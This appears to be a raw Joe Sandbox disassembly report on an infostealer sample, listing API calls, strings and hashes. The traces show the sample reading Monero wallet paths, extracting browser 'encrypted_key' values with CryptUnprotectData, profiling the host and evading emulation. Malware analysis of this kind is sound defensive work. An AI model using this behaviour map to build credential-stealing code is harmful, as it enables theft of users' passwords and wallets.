                                                                                                                                                                                                              • Instruction Fuzzy Hash: 601121B590121DAFEB10DFA0DD89EEAB7BCEF14305F4041E5A619E2062DA709E898F10
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00921A65
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00921A6C
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00921AE9), ref: 00921A89
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(00921AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00921AA4
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00921AE9), ref: 00921AAD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • wallet_path, xrefs: 00921A9C
                                                                                                                                                                                                              • SOFTWARE\monero-project\monero-core, xrefs: 00921A7F
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                                                                                                                                                                                                              • API String ID: 3466090806-4244082812
                                                                                                                                                                                                              • Opcode ID: f3313f54edb719ff20e0a47dcd9d87ba7e12617a173749c90b72bf1d6febfe85
                                                                                                                                                                                                              • Instruction ID: 212a1133d26e924184b129c75e7658813d2cf241fd4df95196469e2ddc821030
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3313f54edb719ff20e0a47dcd9d87ba7e12617a173749c90b72bf1d6febfe85
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DF05E75640304BFFB118B91DC4AFAE7A7CEF88B15F1401A4BA15EA0E1DAB09A809724
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?,00000000,?), ref: 00935EC8
                                                                                                                                                                                                                • Part of subcall function 00931D91: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00931DD2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 00935EE5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935F04
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935F18
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935F2B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935F3F
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935F52
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931D67: GetFileAttributesA.KERNEL32(?,?,?,0092DA54,?,?,?), ref: 00931D6E
                                                                                                                                                                                                                • Part of subcall function 00935B4D: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00935B72
                                                                                                                                                                                                                • Part of subcall function 00935B4D: HeapAlloc.KERNEL32(00000000), ref: 00935B79
                                                                                                                                                                                                                • Part of subcall function 00935B4D: wsprintfA.USER32 ref: 00935B92
                                                                                                                                                                                                                • Part of subcall function 00935B4D: FindFirstFileA.KERNEL32(?,?), ref: 00935BA9
                                                                                                                                                                                                                • Part of subcall function 00935B4D: StrCmpCA.SHLWAPI(?,00956AA0), ref: 00935BCA
                                                                                                                                                                                                                • Part of subcall function 00935B4D: StrCmpCA.SHLWAPI(?,00956AA4), ref: 00935BE4
                                                                                                                                                                                                                • Part of subcall function 00935B4D: wsprintfA.USER32 ref: 00935C0B
                                                                                                                                                                                                                • Part of subcall function 00935B4D: CopyFileA.KERNEL32(?,?,00000001), ref: 00935CC8
                                                                                                                                                                                                                • Part of subcall function 00935B4D: DeleteFileA.KERNEL32(?), ref: 00935CEB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1546541418-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B19
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B20
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B4E
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00956890,00000000,00000000,00000000,000000FF,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B6A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00956890,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B73
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: Windows 11
                                                                                                                                                                                                              • API String ID: 3466090806-2517555085
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B92
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930B99
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930BB7
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00956890,CurrentBuildNumber,00000000,00000000,00000000,000000FF,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ), ref: 00930BD2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00956890,?,?,?,00930BF0,00930B2D,?,?,?,00933ED5,Windows: ,009568A8), ref: 00930BDB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID: CurrentBuildNumber
                                                                                                                                                                                                              • API String ID: 3466090806-1022791448
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009356E4
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,00000000,?), ref: 00935704
                                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF), ref: 0093572A
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00935736
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00935765
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00935778
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3891774339-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                              • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                              • LocalFree.KERNEL32(0092EC91,?,?,?,?,0092E72B,?,?,?), ref: 0092802B
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2311089104-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00931733
                                                                                                                                                                                                              • CoCreateInstance.OLE32(009531B0,00000000,00000001,0095B008,?,00000018,009318D6,?), ref: 00931756
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 00931763
                                                                                                                                                                                                              • _wtoi64.MSVCRT ref: 00931796
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 009317AF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 009317B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Free$AllocCreateH_prolog3_catchInstance_wtoi64
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 181426013-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,001E5D70,00003000,00000004), ref: 009210AA
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009210D0
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 009210E6
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,00938658), ref: 00921100
                                                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 00921107
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00921112
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1859398019-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009316A3
                                                                                                                                                                                                                • Part of subcall function 009323AA: malloc.MSVCRT ref: 009323AF
                                                                                                                                                                                                                • Part of subcall function 009323AA: strncpy.MSVCRT ref: 009323C0
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 009316CB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,00956ED4,?,?,?,?,?), ref: 009316E8
                                                                                                                                                                                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 00931674
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                                                              • String ID: Unknown
                                                                                                                                                                                                              • API String ID: 2781187439-1654365787
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,75BF74F0,?,0093CD7F,?,0093CE0D,00000000,06400000,00000003,00000000,0093770B,.exe,00956C64), ref: 0093BDFF
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,75BF74F0,?,0093CD7F,?,0093CE0D,00000000,06400000,00000003,00000000), ref: 0093BE37
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$CreatePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2024441833-0
                                                                                                                                                                                                              • Opcode ID: a906c056d926c6ae243763217a29cfe6b11d54f255a169ad24d6855ac3138739
                                                                                                                                                                                                              • Instruction ID: 651264479f094726e1321b294f80fbbb9b6beb5a83e12878d5f7442d4965e603
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a906c056d926c6ae243763217a29cfe6b11d54f255a169ad24d6855ac3138739
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A13143B4504B059FDB309F39C884BA77AECAB14759F108E2EE39686681D3749C84DFA1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                              • InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CrackInternetlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1274457161-0
                                                                                                                                                                                                              • Opcode ID: 3f858470bb65307d27a281abc15c846e04ed64504239bc0e06df07aeeed4f8c8
                                                                                                                                                                                                              • Instruction ID: 6e4ed8cc7971937dfd885ade1137c28c25295f46e9aa5ecd0933a9e2863d019c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f858470bb65307d27a281abc15c846e04ed64504239bc0e06df07aeeed4f8c8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5011B32D00218ABCB149BA9EC45ADEBFB8AF55330F108216F925F72E1DA7496018B94
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934), ref: 00930F3A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F41
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ), ref: 00930F5F
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(00956890,00000000,00000000,00000000,000000FF,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000), ref: 00930F7B
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00956890,?,?,?,00934292,Processor: ,[Hardware],00956958,00000000,TimeZone: ,00956948,00000000,Local Time: ,00956934,Keyboard Languages: ,00956918), ref: 00930F84
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3466090806-0
                                                                                                                                                                                                              • Opcode ID: d12f7bc5cf3776ed68ff926b26238cf8ed7c7b0b73033c7e70d4c7ebc067d5f4
                                                                                                                                                                                                              • Instruction ID: c08cbb77564fea8dca7b3e5b20209de3db69f6c60b57f8317fa4b20ffde69b7f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d12f7bc5cf3776ed68ff926b26238cf8ed7c7b0b73033c7e70d4c7ebc067d5f4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EDF03075640304FFEB115B90DC4AFAE7A7CEF48B04F1401A4F715AB0A1DBB099809B24
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00936F59
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,0000001C), ref: 00936F64
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936FE8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchlstrlen
                                                                                                                                                                                                              • String ID: ERROR
                                                                                                                                                                                                              • API String ID: 591506033-2861137601
                                                                                                                                                                                                              • Opcode ID: 7bed47a488c11d8315616f611353c971e4b8eeba2780c5a1f60b948e126ca54b
                                                                                                                                                                                                              • Instruction ID: dd3f9d6029284f4495e2b50f1354f6cae43b3613ba8f367b1ad97ab4a7bf6024
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7bed47a488c11d8315616f611353c971e4b8eeba2780c5a1f60b948e126ca54b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1114C7190050AAFCB50FF64E946B9DBBB0BF84310F504221E818E3965EB35EAA4CFC1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092B3AC
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B4FE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B519
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092B56B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                              • Opcode ID: c2bcb194c341d9a0f261430bba2283358c66e8b5befe5c93c799b8225eff001e
                                                                                                                                                                                                              • Instruction ID: 1db1ec8b0d194d4192066d9b3c7a53e34874938ddefd6593b8971961db09979e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2bcb194c341d9a0f261430bba2283358c66e8b5befe5c93c799b8225eff001e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CB71F836900129ABCF05FBA4ED46ADDBB75AF84305F514121F944B716ADB30AE858F90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?,00957530,0095687B), ref: 0092D474
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092D487
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                                                                                                              • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                                                                                                              • API String ID: 161838763-3310892237
                                                                                                                                                                                                              • Opcode ID: f5148b0d705efd75e2e10b5abe61f2bbec5188093012e619b38a051b17fd4cfa
                                                                                                                                                                                                              • Instruction ID: 4ea3e6aee9535a9ba751093332b8a7b39d3e3dd60563e08460ae1e8eb0b09363
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5148b0d705efd75e2e10b5abe61f2bbec5188093012e619b38a051b17fd4cfa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B41D83690012D9BCF11FFA5EE46ADDB7B4AF84304F414120FD44B316AEA24AE498F91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00931DF4: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00936973,?), ref: 00931E0C
                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0092CC65,?,?), ref: 009281E5
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928060
                                                                                                                                                                                                                • Part of subcall function 00928048: LocalAlloc.KERNEL32(00000040,?,?,?,00926724,?), ref: 0092806E
                                                                                                                                                                                                                • Part of subcall function 00928048: CryptStringToBinaryA.CRYPT32(00926724,00000000,00000001,00000000,?,00000000,00000000), ref: 00928084
                                                                                                                                                                                                                • Part of subcall function 00928048: LocalFree.KERNEL32(?,?,?,00926724,?), ref: 00928093
                                                                                                                                                                                                                • Part of subcall function 009280A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0092823B), ref: 009280C4
                                                                                                                                                                                                                • Part of subcall function 009280A1: LocalAlloc.KERNEL32(00000040,0092823B,?,?,0092823B,0092CB6A,?,?,?,?,?,?,?,0092CC65,?,?), ref: 009280D8
